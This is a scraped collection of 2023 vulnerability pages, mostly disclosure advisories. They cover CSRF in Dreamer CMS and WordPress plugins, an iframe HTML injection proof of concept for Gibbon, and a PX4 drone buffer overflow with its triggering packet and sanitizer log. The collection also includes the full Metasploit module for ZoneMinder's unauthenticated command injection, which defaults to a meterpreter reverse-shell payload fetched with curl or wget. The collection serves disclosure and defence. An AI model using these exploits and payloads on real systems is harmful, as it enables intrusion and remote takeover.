Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/task/changeStatus.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-48020: dreamer_cms/Enable CSRF for Task Management Office.md at main · moonsabc123/dreamer_cms

GibbonEdu Gibbon version 25.0.0 allows HTML Injection via an IFRAME element to the Messager component.

**usd-2023-0019 | HTML Injection**

**Advisory ID**: usd-2023-0019  
**Product**: Gibbon (https://gibbonedu.org/)  
**Affected Version**: 25.0.00  
**Vulnerability Type**: CWE-79  
**Security Risk**: Medium  
**Vendor URL**: https://gibbonedu.org  
**Vendor acknowledged vulnerability**: Yes  
**Vendor Status**: Fixed  
**CVE number**: CVE-2023-45879

**Desciption**

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes  
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

A user with permissions to send messages can inject an **iframe** into the application.  
This can be used to abuse a XSS/CSRF vulnerability in the admin backend, to create a new admin user.

The message can be send to an existing admin user. When the target opens the message, the (hidden) **iframe** will be embedded into the application.

**Proof of Concept**

To create the message, navigate to the _Home > Messenger > New Message_ site.

Fill the form and select an admin user as reciepent. Intercept the request and change the message body to

<iframe src="http://responsible-disclosure:8989/index.html"></iframe>

POST /modules/Messenger/messenger\_postProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="address"


/modules/Messenger/messenger\_post.php
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="subject"

test
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="body"

<p><iframe src="http://localhost:8989/index.html"></iframe></p>
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
\[...\]
Content-Disposition: form-data; name="individualList\[\]"

0000000001
------WebKitFormBoundaryHs6JkrrxpoUfeRfX--

As shown in the screenshot below, the iframe is injected into the message.  

**Fix**

It is recommended to treat all input on the website as potentially dangerous.

**References**

*   https://owasp.org/www-project-web-security-testing-guide/latest/4-Web\_Application\_Security\_Testing/11-Client-side\_Testing/03-Testing\_for\_HTML\_Injection

**Timeline**

*   **2023-06-27**: Vulnerability identified by Christian Poeschl
*   **2023-09-19**: Security Release v25.0.01
*   **2023-11-02**: Advisory published

**Credits**

This security vulnerability was identified by Christian Poeschl of usd AG.

CVE-2023-45879: usd-2023-0019 - usd HeroLab

This Metasploit module exploits an unauthenticated command injection in zoneminder that can be exploited by appending a command to an action of the snapshot view. Versions prior to 1.36.33 and 1.37.33 are affected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework###class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Exploit::Remote::AutoCheck  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ZoneMinder Snapshots Command Injection',        'Description' => %q{          This module exploits an unauthenticated command injection          in zoneminder that can be exploited by appending a command          to the "create monitor ids[]"-action of the snapshot view.          Affected versions: < 1.36.33, < 1.37.33        },        'License' => MSF_LICENSE,        'Author' => [          'UnblvR',    # Discovery          'whotwagner' # Metasploit Module        ],        'References' => [          [ 'CVE', '2023-26035' ],          [ 'URL', 'https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr']        ],        'Privileged' => false,        'Platform' => ['linux', 'unix'],        'Targets' => [          [            'nix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',                'FETCH_WRITABLE_DIR' => '/tmp'              }            }          ],          [            'Linux (Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64],              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },              'Type' => :linux_dropper            }          ],        ],        'CmdStagerFlavor' => [ 'bourne', 'curl', 'wget', 'printf', 'echo' ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-02-24',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])    ])  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'GET'    )    return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?    return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200    unless res.body.include?('ZoneMinder')      return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')    end    csrf_magic = get_csrf_magic(res)    # This check executes a sleep-command and checks the response-time    sleep_time = rand(5..10)    data = "view=snapshot&action=create&monitor_ids[0][Id]=0;sleep #{sleep_time}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res, elapsed_time = Rex::Stopwatch.elapsed_time do      send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'index.php'),        'method' => 'POST',        'data' => data.to_s,        'keep_cookies' => true      )    end    return Exploit::CheckCode::Unknown('Could not connect to the web service') unless res    print_status("Elapsed time: #{elapsed_time} seconds.")    if sleep_time < elapsed_time      return Exploit::CheckCode::Vulnerable    end    Exploit::CheckCode::Safe('Target is not vulnerable')  end  def execute_command(cmd, _opts = {})    command = Rex::Text.uri_encode(cmd)    print_status('Sending payload')    data = "view=snapshot&action=create&monitor_ids[0][Id]=;#{command}"    data += "&__csrf_magic=#{@csrf_magic}" if @csrf_magic    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'POST',      'data' => data.to_s    )    print_good('Payload sent')  end  def exploit    # get magic csrf-token    print_status('Fetching CSRF Token')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'GET'    )    if res && res.code == 200      # parse token      @csrf_magic = get_csrf_magic(res)      unless @csrf_magic =~ /^key:[a-f0-9]{40},\d+/        fail_with(Failure::UnexpectedReply, 'Unable to parse token.')      end    else      fail_with(Failure::UnexpectedReply, 'Unable to fetch token.')    end    print_good("Got Token: #{@csrf_magic}")    # send payload    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  end  private  def get_csrf_magic(res)    return if res.nil?    res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text  endend

ZoneMinder Snapshots Command Injection

PX4 autopilot is a flight control solution for drones. In affected versions a global buffer overflow vulnerability exists in the CrsfParser_TryParseCrsfPacket function in /src/drivers/rc/crsf_rc/CrsfParser.cpp:298 due to the invalid size check. A malicious user may create an RC packet remotely and that packet goes into the device where the _rcs_buf reads. The global buffer overflow vulnerability will be triggered and the drone can behave unexpectedly. This issue has been addressed in version 1.14.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.

**Summary**

We identified a global buffer overflow vulnerability in the CrsfParser\_TryParseCrsfPacket function in /src/drivers/rc/crsf\_rc/CrsfParser.cpp:298 due to the invalid size check.

We investigated by the following process

1.  Enable the crsf\_rc driver
2.  Write the data (i.e., packet) to \_rcs\_buf used in the crsf\_rc driver on a device
3.  Global buffer overflow vulnerability in the _CrsfParser\_TryParseCrsfPacket_ function will be triggered when the _CrsfParser\_TryParseCrsfPacket_ function parses this data.

The following packet can trigger the vulnerability as mentioned above.

packet\[0\] \= 0xc8; // MAGIC NUMBER which informs rc packet start
packet\[1\] \= 62; // size of the packet
packet\[2\] \= 100; // packet type ( random, not the 0x16, 0x14 )

**Detailed Root Cause**

We first assumed that we can write the arbitrary data into \_rcs\_buf using the following code.

*   /src/drivers/rc/crsf\_rc/CrsfRc.cpp #190 line

int new\_bytes \= ::read(\_rc\_fd, &\_rcs\_buf\[0\], RC\_MAX\_BUFFER\_SIZE);

After that, CrsfParser\_TryParseCrsfPacket will be called and parse the information of the rc packet in \_rcs\_buf.

*   The CrsfParser\_TryParseCrsfPacket function checks the following conditions

1.  The first byte of the packet is same with CRSF\_HEADER (0xc8). (CrsfParser.cpp:256)

case PARSER\_STATE\_HEADER:
			if (QueueBuffer\_Get(&rx\_queue, &working\_byte)) {
				if (working\_byte \== CRSF\_HEADER) {
	//...omitted...

1.  Whether the type of the packet is known or not.
    *   If the packet’s type is not 0x16 or 0x14, then the working\_segment\_size sets packet_size(our input) + PACKET_SIZE_TYPE(2);
2.  The working\_segment\_size should be less or equal than CRSF\_MAX\_PACKET\_LEN which is 64. (if condition in CrsfParser.cpp:298)
    *   In that case, if we send the packet which sets size as 62, then working\_segment\_size will be 64, and this corresponds to the if condition (working_segment_size <= CRSF_MAX_PACKET_LEN). Because the previous condition added 2 with the size of the packet.
    *   It makes to pass this if condition, and working\_index will set as 2 consequently.

case PARSER\_STATE\_SIZE\_TYPE:
			//PX4\_INFO("PARSER\_STATE\_SIZE\_TYPE\\n");
			QueueBuffer\_Peek(&rx\_queue, working\_index++, &packet\_size); //working\_index = 1
			QueueBuffer\_Peek(&rx\_queue, working\_index++, &packet\_type); //working\_index = 2

			working\_descriptor \= FindCrsfDescriptor((enum CRSF\_PACKET\_TYPE)packet\_type);

			// If we know what this packet is...
			if (working\_descriptor != NULL) {
				//.. the packet's type was 0x16 or 0x14
				//..omitted
				}
			} else {
				// We don't know what this packet is, so we'll let the parser continue
				// just so that we can dequeue it in one shot
				working\_segment\_size \= packet\_size + PACKET\_SIZE\_TYPE\_SIZE; //PACKET\_SIZE\_TYPE\_SIZE : 2

				if (working\_segment\_size \> CRSF\_MAX\_PACKET\_LEN) {
					parser\_statistics\->invalid\_unknown\_packet\_sizes++;
					parser\_state \= PARSER\_STATE\_HEADER;
					working\_segment\_size \= HEADER\_SIZE;
					working\_index \= 0;
					buffer\_count \= QueueBuffer\_Count(&rx\_queue);
					continue;
				}
			}

			parser\_state \= PARSER\_STATE\_PAYLOAD;
			break;

*   Next, in the PARSER\_STATE\_HEADER part, working_index += working_segment_size is conducted. For our case, working\_index is 2 because of the previous parsing part, working\_idex will be 2 + 64 = 66.

case PARSER\_STATE\_PAYLOAD:
			working\_index += working\_segment\_size;
			working\_segment\_size \= CRC\_SIZE;
			parser\_state \= PARSER\_STATE\_CRC;
			break;

*   The _QueueBuffer\_PeekBuffer_ function will be called with the 4th parameter represents size as 67 (because CRC\_SIZE is 1)

case PARSER\_STATE\_CRC:
			// Fetch the suspected packet as a contingous block of memory
			QueueBuffer\_PeekBuffer(&rx\_queue, 0, process\_buffer, working\_index + CRC\_SIZE);

bool QueueBuffer\_PeekBuffer(const QueueBuffer\_t \*q, const uint32\_t index, uint8\_t \*buffer, const uint32\_t size)
{
	uint32\_t copy\_start;

	//...omitted

	// Check if we can do this in a single shot
	if (copy\_start + size <= q\->buffer\_size) {
		memcpy((void \*)buffer, (void \*)(q\->buffer + copy\_start), size); //this will be called

	} 

*   Eventually, the data is copied to process\_buffer like this (Our case for QueueBuffer.cpp:153)

memcpy(process\_buffer, data, 67);

*   But the initialized size of process\_buffer is 64
    
    #define CRSF\_MAX\_PACKET\_LEN 64
    static uint8\_t process\_buffer\[CRSF\_MAX\_PACKET\_LEN\];
    

Therefore, the Global buffer overflow will be triggered.

**PoC ( Reproduce Method )**

We want to reproduce this crash using the actual rc packet, but we just triggered this crash in sitl because we don’t have the actual device yet. So, we’ve tested under the situation we can write the arbitrary data in the device using the crsf\_rc driver to receive packets.

So, we suggest the following process to reproduce this packet.

1.  We set the csrf\_rc driver in sitl by modifying the configure of default.px4board.
    
    CONFIG\_DRIVERS\_RC\_CRSF\_RC\=y
    
2.  We set the \_rcs\_buf buffer (in drivers/crsf\_rc/CrsfRc.cpp line 190) as below
    
    *   Assuming that the buffer gets the data.
    
    int new\_bytes \= ::read(\_rc\_fd, &\_rcs\_buf\[0\], RC\_MAX\_BUFFER\_SIZE);
    \_rcs\_buf\[0\] \= 0xc8; // MAGIC NUMBER which informs rc packet start
    \_rcs\_buf\[1\] \= 62; // size of the packet ( which is vulnerable )
    \_rcs\_buf\[2\] \= 100; // packet type ( random, not the 0x16, 0x14 )
    new\_bytes \= 60 // informs the packet is received
    
3.  We run the crsf\_rc driver like this
    
    pxh\> crsf\_rc start \-d <device\>
    
    *   For example,
    
    pxh\> crsf\_rc start \-d /dev/ttyS3
    

**Address Sanitizer Log**

\=================================================================
==5090==ERROR: AddressSanitizer: global-buffer-overflow on address 0x563750d9c500 at pc 0x7f15a823a2c3 bp 0x7f15a4606220 sp 0x7f15a46059c8
WRITE of size 67 at 0x563750d9c500 thread T140
ERROR \[simulator\_mavlink\] poll timeout 0, 22
    #0 0x7f15a823a2c2 in \_\_interceptor\_memcpy ../../../../src/libsanitizer/sanitizer\_common/sanitizer\_common\_interceptors.inc:827
    #1 0x56375022476a in memcpy /usr/include/x86\_64-linux-gnu/bits/string\_fortified.h:29
    #2 0x56375022476a in QueueBuffer\_PeekBuffer(QueueBuffer\_t const\*, unsigned int, unsigned char\*, unsigned int) /home/ubuntu/drone/PX4-Autopilot/src/drivers/rc/crsf\_rc/QueueBuffer.cpp:156
    #3 0x563750223952 in CrsfParser\_TryParseCrsfPacket(CrsfPacket\_t\*, CrsfParserStatistics\_t\*) /home/ubuntu/drone/PX4-Autopilot/src/drivers/rc/crsf\_rc/CrsfParser.cpp:330
    #4 0x56375022126d in CrsfRc::Run() /home/ubuntu/drone/PX4-Autopilot/src/drivers/rc/crsf\_rc/CrsfRc.cpp:211
    #5 0x563750a44b00 in px4::WorkQueue::Run() /home/ubuntu/drone/PX4-Autopilot/platforms/common/px4\_work\_queue/WorkQueue.cpp:188
    #6 0x563750a459bc in WorkQueueRunner /home/ubuntu/drone/PX4-Autopilot/platforms/common/px4\_work\_queue/WorkQueueManager.cpp:238
    #7 0x7f15a7294b42 in start\_thread nptl/pthread\_create.c:442
    #8 0x7f15a73269ff  (/lib/x86\_64-linux-gnu/libc.so.6+0x1269ff)

0x563750d9c500 is located 32 bytes to the left of global variable 'rx\_queue\_buffer' defined in '/home/ubuntu/drone/PX4-Autopilot/src/drivers/rc/crsf\_rc/CrsfParser.cpp:138:16' (0x563750d9c520) of size 200
0x563750d9c500 is located 0 bytes to the right of global variable 'process\_buffer' defined in '/home/ubuntu/drone/PX4-Autopilot/src/drivers/rc/crsf\_rc/CrsfParser.cpp:139:16' (0x563750d9c4c0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow ../../../../src/libsanitizer/sanitizer\_common/sanitizer\_common\_interceptors.inc:827 in \_\_interceptor\_memcpy
Shadow bytes around the buggy address:
  0x0ac76a1ab850: f9 f9 f9 f9 00 00 00 00 02 f9 f9 f9 f9 f9 f9 f9
  0x0ac76a1ab860: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0ac76a1ab870: 00 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9
  0x0ac76a1ab880: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0ac76a1ab890: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
=\>0x0ac76a1ab8a0:\[f9\]f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ac76a1ab8b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
  0x0ac76a1ab8c0: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 04 f9 f9 f9
  0x0ac76a1ab8d0: f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0ac76a1ab8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ac76a1ab8f0: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
Thread T140 created by T5 here:
    #0 0x7f15a8258685 in \_\_interceptor\_pthread\_create ../../../../src/libsanitizer/asan/asan\_interceptors.cpp:216
    #1 0x563750a4608a in WorkQueueManagerRun /home/ubuntu/drone/PX4-Autopilot/platforms/common/px4\_work\_queue/WorkQueueManager.cpp:324

Thread T5 created by T0 here:
    #0 0x7f15a8258685 in \_\_interceptor\_pthread\_create ../../../../src/libsanitizer/asan/asan\_interceptors.cpp:216
    #1 0x563750a40aab in px4\_task\_spawn\_cmd /home/ubuntu/drone/PX4-Autopilot/platforms/posix/src/px4/common/tasks.cpp:252

==5090==ABORTING

**Recommend Patch**

After the line of CrsfParser.cpp:319, the additional limitations of the size will prevent the bug as mentioned before.

case PARSER\_STATE\_CRC:
			// Fetch the suspected packet as a contingous block of memory
			if(working\_index+CRC\_SIZE \> CRSF\_MAX\_PACKET\_LEN){
				  parser\_statistics\->invalid\_unknown\_packet\_sizes++;
					parser\_state \= PARSER\_STATE\_HEADER;
					working\_segment\_size \= HEADER\_SIZE;
					working\_index\=0;
					buffer\_count \= QueueBuffer\_Count(&rx\_queue);
					continue;
			}
			QueueBuffer\_PeekBuffer(&rx\_queue, 0, process\_buffer, working\_index + CRC\_SIZE);

**Impact**

If we can create the RC packet remotely and that packet goes into the device where the \_rcs\_buf reads, the global buffer overflow vulnerability will be triggered so that the drone can behave unexpectedly.

CVE-2023-47625: [Bug Report] Vulnerable Bug Found in CrsfParser_TryParseCrsfPacket which can trigger Global Buffer Overflow

Cross-Site Request Forgery (CSRF) vulnerability in Dream-Theme The7 allows Stored XSS.This issue affects The7: from n/a through 11.7.3.



**Solution**

 No fix

No patched version is provided by the vendor.

Dave Jong (Patchstack) discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress The7 Theme. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this theme**

 1 present

 1 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-32123: WordPress The7 — Website and eCommerce Builder for WordPress theme <= 11.7.3 - Cross-Site Request Forgery (CSRF) - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Haoqisir Baidu Tongji generator allows Stored XSS.This issue affects Baidu Tongji generator: from n/a through 1.0.2.



**Solution**

 No fix

No patched version is available. Reported to the WordPress plugins review team.

LEE SE HYOUNG (hackintoanetwork) discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Baidu Tongji generator Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 2 present

 0 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-31230: WordPress Baidu Tongji generator plugin <= 1.0.2 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Vadym K. Extra User Details allows Stored XSS.This issue affects Extra User Details: from n/a through 0.5.



**Solution**

 Fixed

Update the WordPress Extra User Details plugin to the latest available version (at least 0.5.1).

LEE SE HYOUNG (hackintoanetwork) discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Extra User Details Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 0.5.1.

**Other vulnerabilities in this plugin**

 0 present

 3 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-35877: WordPress Extra User Details plugin <= 0.5 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in tagDiv tagDiv Composer allows Cross-Site Scripting (XSS).This issue affects tagDiv Composer: from n/a before 4.4.



**Solution**

 Fixed

Update the WordPress tagDiv Composer plugin to the latest available version (at least 4.4).

Truoc Phan discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress tagDiv Composer Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 4.4.

**Other vulnerabilities in this plugin**

 0 present

 5 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-39166: WordPress tagDiv Composer plugin < 4.4 - CSRF to XSS vulnerability - Patchstack

An issue was discovered in dreamer_cms 4.1.3. There is a CSRF vulnerability that can delete a theme project via /admin/category/delete.

CVE-2023-48063: cms/There is a CSRF vulnerability at th menu management location.md at dreamcms_vul · CP1379767017/cms

Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/task/add

Tag

#csrf